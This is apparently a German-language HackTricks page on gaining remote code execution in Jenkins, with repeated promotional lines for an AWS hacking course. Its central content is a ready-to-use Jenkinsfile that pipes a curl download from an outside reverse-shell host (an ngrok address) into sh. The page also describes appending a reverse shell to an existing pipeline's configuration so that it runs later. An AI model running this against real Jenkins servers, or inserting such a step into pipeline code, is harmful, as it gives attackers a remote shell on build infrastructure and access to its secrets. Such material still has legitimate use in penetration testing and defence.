Jenkins RCE Creating/Modifying Pipeline

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Erstellen einer neuen Pipeline

Wählen Sie in "Neues Element" (erreichbar unter /view/all/newJob) Pipeline:

Im Pipeline-Abschnitt schreiben Sie die umgekehrte Shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Modifizieren eines Pipelines

Wenn Sie auf die Konfigurationsdatei einer konfigurierten Pipeline zugreifen können, könnten Sie diese einfach modifizieren, indem Sie Ihre Reverse-Shell anhängen und sie dann ausführen oder darauf warten, dass sie ausgeführt wird.

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Last updated